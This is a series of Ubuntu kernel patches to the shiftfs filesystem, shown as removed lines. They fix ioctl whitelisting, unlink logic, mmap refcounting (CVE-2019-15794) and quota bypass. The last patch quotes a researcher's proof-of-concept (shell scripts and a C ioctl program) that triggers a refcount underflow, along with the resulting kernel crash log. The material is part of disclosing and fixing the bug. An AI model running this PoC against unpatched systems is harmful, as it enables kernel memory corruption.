- 1 file changed, 18 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a1dae7ea593b..49f6714e9f95 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1507,9 +1507,14 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 	return ret;
- }
- 
--static bool in_ioctl_whitelist(int flag)
-+static bool in_ioctl_whitelist(int flag, unsigned long arg)
- {
-+	void __user *argp = (void __user *)arg;
-+	u64 flags = 0;
-+
- 	switch (flag) {
-+	case BTRFS_IOC_FS_INFO:
-+		return true;
- 	case BTRFS_IOC_SNAP_CREATE:
- 		return true;
- 	case BTRFS_IOC_SNAP_CREATE_V2:
-@@ -1517,6 +1522,16 @@ static bool in_ioctl_whitelist(int flag)
- 	case BTRFS_IOC_SUBVOL_CREATE:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_GETFLAGS:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_SETFLAGS:
-+		if (copy_from_user(&flags, arg, sizeof(flags)))
-+			return false;
-+
-+		if (flags & ~BTRFS_SUBVOL_RDONLY)
-+			return false;
-+
- 		return true;
- 	case BTRFS_IOC_SNAP_DESTROY:
- 		return true;
-@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOTTY;
- 	}
-@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOIOCTLCMD;
- 	}
--- 
-2.39.2
-
-From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:46 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837223
-
-This enabled O_DIRECT support for shiftfs if the underlay supports it.
-
-Currently shiftfs does not handle O_DIRECT if the underlay supports it.
-This is blocking dqlite - an essential part of LXD - from profiting from
-the performance benefits of O_DIRECT on suitable filesystems when used
-with async io such as aio or io_uring.
-Overlayfs cannot support this directly since the upper filesystem in
-overlay can be any filesystem. So if the upper filesystem does not
-support O_DIRECT but the lower filesystem does you're out of luck.
-Shiftfs does not suffer from the same problem since there is not concept
-of an upper filesystem in the same way that overlayfs has it.
-Essentially, shiftfs is a transparent shim relaying everything to the
-underlay while overlayfs' upper layer is not (completely).
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 49f6714e9f95..addaa6e21e57 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
- 	}
- 
- 	file->private_data = file_info;
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
-+	file->f_mapping = realfile->f_mapping;
-+
- 	file_info->realfile = realfile;
- 	return 0;
- }
--- 
-2.39.2
-
-From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:47 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct point down
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837231
-
-This used to pass an unsigned long to copy_from_user() instead of a
-void __user * pointer. This will produce warning with a sufficiently
-advanced compiler.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index addaa6e21e57..9006201c243d 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
- 	case BTRFS_IOC_SUBVOL_GETFLAGS:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_SETFLAGS:
--		if (copy_from_user(&flags, arg, sizeof(flags)))
-+		if (copy_from_user(&flags, argp, sizeof(flags)))
- 			return false;
- 
- 		if (flags & ~BTRFS_SUBVOL_RDONLY)
--- 
-2.39.2
-
-From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Thu, 29 Aug 2019 20:45:07 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1841977
-
-The way we messed with setting i_nlink was brittle and wrong. We used to
-set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
-of the underlay dentry of the directory it resided in which makes no
-sense whatsoever. We also missed drop_nlink() which is crucial since
-i_nlink affects whether a dentry is cleaned up on dput().
-With this I cannot reproduce the bug anymore where shiftfs misleads zfs
-into believing that a deleted file can not be removed from disk because
-it is still referenced.
-
-Fixes: commit 87011da41961 ("shiftfs: rework and extend")
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9006201c243d..e80db9480b5c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
-+	struct inode *inode = d_inode(dentry);
- 	int err;
- 	const struct cred *oldcred;
- 
-@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 		err = vfs_rmdir(loweri, lowerd);
- 	else
- 		err = vfs_unlink(loweri, lowerd, NULL);
--	inode_unlock(loweri);
- 	revert_creds(oldcred);
- 
--	shiftfs_copyattr(loweri, dir);
--	set_nlink(d_inode(dentry), loweri->i_nlink);
--	if (!err)
-+	if (!err) {
- 		d_drop(dentry);
- 
--	set_nlink(dir, loweri->i_nlink);
-+		if (rmdir)
-+			clear_nlink(inode);
-+		else
-+			drop_nlink(inode);
-+	}
-+	inode_unlock(loweri);
-+
-+	shiftfs_copyattr(loweri, dir);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 30 Aug 2019 14:14:31 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
- SLAB_RECLAIM_ACCOUNT
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1842059
-
-Shiftfs does not mark it's slab cache as reclaimable. While this is not
-a big deal it is not nice to the kernel in general. The shiftfs cache is
-not so important that it can't be reclaimed.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e80db9480b5c..a21cb473e000 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
- {
- 	shiftfs_file_info_cache = kmem_cache_create(
- 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
- 	if (!shiftfs_file_info_cache)
- 		return -ENOMEM;
- 
--- 
-2.39.2
-
-From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 2 Oct 2019 09:57:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1846265
-
-This commit simplifies how shiftfs open files, both regular files an
-directories.
-
-In the first iteration, we implemented a kmem cache for struct
-shiftfs_file_info which stashed away a struct path and the struct file
-for the underlay. The path however was never used anywhere so the struct
-shiftfs_file_info and therefore the whole kmem cache can go away.
-Instead we move to the same model as overlayfs and just stash away the
-struct file for the underlay in file->private_data of the shiftfs struct
-file.
-Addtionally, we split the .open method for files and directories.
-Similar to overlayfs .open for regular files uses open_with_fake_path()
-which ensures that it doesn't contribute to the open file count (since
-this would mean we'd count double). The .open method for directories
-however used dentry_open() which contributes to the open file count.
-
-The basic logic for opening files is unchanged. The main point is to
-ensure that a reference to the underlay's dentry is kept through struct
-path.
-
-Various bits and pieces of this were cooked up in discussions Seth and I
-had in Paris.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
- 1 file changed, 47 insertions(+), 58 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21cb473e000..55bb32b611f2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -31,13 +31,6 @@ struct shiftfs_super_info {
- 	unsigned int passthrough_mark;
- };
- 
--struct shiftfs_file_info {
--	struct path realpath;
--	struct file *realfile;
--};
--
--struct kmem_cache *shiftfs_file_info_cache;
--
- static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 			       umode_t mode, dev_t dev, struct dentry *dentry);
- 
-@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
- };
- 
- static struct file *shiftfs_open_realfile(const struct file *file,
--					  struct path *realpath)
-+					  struct inode *realinode)
- {
--	struct file *lowerf;
--	const struct cred *oldcred;
-+	struct file *realfile;
-+	const struct cred *old_cred;
- 	struct inode *inode = file_inode(file);
--	struct inode *loweri = realpath->dentry->d_inode;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
- 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
- 
--	oldcred = shiftfs_override_creds(inode->i_sb);
--	/* XXX: open_with_fake_path() not gauranteed to stay around, if
--	 * removed use dentry_open() */
--	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
--	revert_creds(oldcred);
-+	old_cred = shiftfs_override_creds(inode->i_sb);
-+	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
-+				       info->creator_cred);
-+	revert_creds(old_cred);
- 
--	return lowerf;
-+	return realfile;
- }
- 
- #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	lowerfd->flags = 0;
- 	lowerfd->file = realfile;
-@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- 
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
--	struct shiftfs_file_info *file_info;
- 	struct file *realfile;
--	struct path *realpath;
- 
--	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
--	if (!file_info)
--		return -ENOMEM;
--
--	realpath = &file_info->realpath;
--	realpath->mnt = ssi->mnt;
--	realpath->dentry = file->f_path.dentry->d_fsdata;
--
--	realfile = shiftfs_open_realfile(file, realpath);
--	if (IS_ERR(realfile)) {
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	realfile = shiftfs_open_realfile(file, inode->i_private);
-+	if (IS_ERR(realfile))
- 		return PTR_ERR(realfile);
--	}
- 
--	file->private_data = file_info;
-+	file->private_data = realfile;
- 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
- 	file->f_mapping = realfile->f_mapping;
- 
--	file_info->realfile = realfile;
- 	return 0;
- }
- 
--static int shiftfs_release(struct inode *inode, struct file *file)
-+static int shiftfs_dir_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
-+			       info->creator_cred);
-+	revert_creds(oldcred);
-+	if (IS_ERR(realfile))
-+		return PTR_ERR(realfile);
- 
--	if (file_info) {
--		if (file_info->realfile)
--			fput(file_info->realfile);
-+	file->private_data = realfile;
- 
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
--	}
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct file *realfile = file->private_data;
-+
-+	if (realfile)
-+		fput(realfile);
- 
- 	return 0;
- }
- 
-+static int shiftfs_dir_release(struct inode *inode, struct file *file)
-+{
-+	return shiftfs_release(inode, file);
-+}
-+
- static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	return vfs_llseek(realfile, offset, whence);
- }
-@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
- 
- static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 	const struct cred *oldcred;
- 	int ret;
- 
-@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- {
- 	const struct cred *oldcred;
- 	int err = -ENOTDIR;
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
- 	err = iterate_dir(realfile, ctx);
-@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
- };
- 
- const struct file_operations shiftfs_dir_operations = {
-+	.open			= shiftfs_dir_open,
-+	.release		= shiftfs_dir_release,
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
- 	.llseek			= shiftfs_dir_llseek,
--	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
--	.release		= shiftfs_release,
- 	.unlocked_ioctl		= shiftfs_ioctl,
- };
- 
-@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
--	shiftfs_file_info_cache = kmem_cache_create(
--		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
--	if (!shiftfs_file_info_cache)
--		return -ENOMEM;
--
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
--	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
--- 
-2.39.2
-
-From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Wed, 6 Nov 2019 09:38:57 -0600
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
- mmap fails
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850994
-
-shiftfs_mmap() overwrites vma->vm_file before calling the lower
-filesystem mmap but does not restore the original value on
-failure. This means it is giving a pointer to the lower fs file
-back to the caller with no reference, which is a bad practice.
-However, it does not lead to any issues with upstream kernels as
-no caller accesses vma->vm_file after call_mmap().
-
-With the aufs patches applied the story is different. Whereas
-mmap_region() previously fput a local variable containing the
-file it assigned to vm_file, it now calls vma_fput() which will
-fput vm_file, for which it has no reference, and the reference
-for the original vm_file is not put.
-
-Fix this by restoring vma->vm_file to the original value when the
-mmap call into the lower fs fails.
-
-CVE-2019-15794
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 +++++++++++----
- 1 file changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 55bb32b611f2..57d84479026b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- 
- 	shiftfs_file_accessed(file);
- 
--	if (ret)
--		fput(realfile); /* Drop refcount from new vm_file value */
--	else
--		fput(file); /* Drop refcount from previous vm_file value */
-+	if (ret) {
-+		/*
-+		 * Drop refcount from new vm_file value and restore original
-+		 * vm_file value
-+		 */
-+		vma->vm_file = file;
-+		fput(realfile);
-+	} else {
-+		/* Drop refcount from previous vm_file value */
-+		fput(file);
-+	}
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:22:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849482
-
-Set the s_maxbytes limit to MAX_LFS_FILESIZE.
-Currently shiftfs limits the maximum size for fallocate() needlessly
-causing calls such as fallocate --length 2GB ./file to fail. This
-limitation is arbitrary since it's not caused by the underlay but
-rather by shiftfs itself capping the s_maxbytes. This causes bugs such
-as the one reported in [1].
-
-[1]: https://github.com/lxc/lxd/issues/6333
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 57d84479026b..6a2b5e3d0d53 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	inode->i_private = dentry->d_inode;
- 
- 	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_maxbytes = MAX_LFS_FILESIZE;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--- 
-2.39.2
-
-From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:23:50 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
- capabilities
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849483
-
-Currently shiftfs allows to exceed project quota and reserved space on
-e.g. ext2. See [1] and especially [2] for a bug report. This is very
-much not what we want. Quotas and reserverd space settings set on the
-host need to respected. The cause for this issue is overriding the
-credentials with the superblock creator's credentials whenever we
-perform operations such as fallocate() or writes while retaining
-CAP_SYS_RESOURCE.
-
-The fix is to drop CAP_SYS_RESOURCE from the effective capability set
-after we have made a copy of the superblock creator's credential at
-superblock creation time. This very likely gives us more security than
-we had before and the regression potential seems limited. I would like
-to try this apporach first before coming up with something potentially
-more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
-limiting factor in most use-cases.
-
-[1]: https://github.com/lxc/lxd/issues/6333
-[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 6a2b5e3d0d53..0d6ce377b07c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
-+		struct cred *cred_tmp;
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
- 		/* to mark a mount point, must root wrt lower s_user_ns */
-@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
--		sbinfo->creator_cred = prepare_creds();
--		if (!sbinfo->creator_cred) {
-+		cred_tmp = prepare_creds();
-+		if (!cred_tmp) {
- 			err = -ENOMEM;
- 			goto out_put_path;
- 		}
-+		/* Don't override disk quota limits or use reserved space. */
-+		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 10:41:03 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
- handling
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
-file from the lower filesystem without taking an additional
-reference to that file. After the btrfs ioctl completes this fd
-is closed, which then puts a reference to that file, leading to a
-refcount underflow. Original bug report and test case from Jann
-Horn is below.
-
-Fix this, and at the sametime simplify the management of the fd
-to the lower file for the ioctl. In
-shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
-the lower file and set FDPUT_FPUT so that this reference will get
-dropped on fdput() in error paths. Do not maintain the struct fd
-in the caller, as it the fd installed in the fd table is
-sufficient to properly clean up. Finally, remove the fdput() in
-shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
-__close_fd() call.
-
-Original report from Jann Horn:
-
-In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
-
- src = fdget(oldfd);
- if (!src.file)
-  return -EINVAL;
- // src holds one reference (assuming multithreaded execution)
-
- ret = shiftfs_real_fdget(src.file, lfd);
- // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
- // extra references
- fdput(src);
- // this drops the only reference we were holding on src, and src was
- // the only thing holding a reference to lfd->file. lfd->file may be
- // dangling at this point.
- if (ret)
-  return ret;
-
- *newfd = get_unused_fd_flags(lfd->file->f_flags);
- if (*newfd < 0) {
-  // always a no-op
-  fdput(*lfd);
-  return *newfd;
- }
-
- fd_install(*newfd, lfd->file);
- // fd_install() consumes a counted reference, but we don't hold any
- // counted references. so at this point, if lfd->file hasn't been freed
- // yet, its refcount is one lower than it ought to be.
-
- [...]
-
- // the following code is refcount-neutral, so the refcount stays one too
- // low.
- if (ret)
-  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-
-shiftfs_real_fdget() is implemented as follows:
-
-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-{
- struct shiftfs_file_info *file_info = file->private_data;
- struct file *realfile = file_info->realfile;
-
- lowerfd->flags = 0;
- lowerfd->file = realfile;
-
- /* Did the flags change since open? */
- if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-  return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
- return 0;
-}
-
-Therefore, the following PoC will cause reference count overdecrements; I ran it
-with SLUB debugging enabled and got the following splat:
-
-=======================================
-user@ubuntu1910vm:~/shiftfs$ cat run.sh
-sync
-unshare -mUr ./run2.sh
-t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
-set -e
-
-mkdir -p mnt/tmpfs
-mkdir -p mnt/shiftfs
-mount -t tmpfs none mnt/tmpfs
-mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
-mount|grep shift
-touch mnt/tmpfs/foo
-gcc -o ioctl ioctl.c -Wall
-./ioctl
-user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
-
-int main(void) {
-  int root = open("mnt/shiftfs", O_RDONLY);
-  if (root == -1) err(1, "open shiftfs root");
-  int foofd = openat(root, "foo", O_RDONLY);
-  if (foofd == -1) err(1, "open foofd");
-  struct btrfs_ioctl_vol_args iocarg = {
-    .fd = foofd
-  };
-  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
-  sleep(1);
-  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
-  if (map != MAP_FAILED) munmap(map, 0x1000);
-}
-user@ubuntu1910vm:~/shiftfs$ ./run.sh
-none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
-/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
-[ 183.463452] general protection fault: 0000 [#1] SMP PTI
-[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
-[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
-[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-[ 183.510580] Call Trace:
-[ 183.511396] mmap_region+0x417/0x670
-[ 183.512592] do_mmap+0x3a8/0x580
-[ 183.513655] vm_mmap_pgoff+0xcb/0x120
-[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
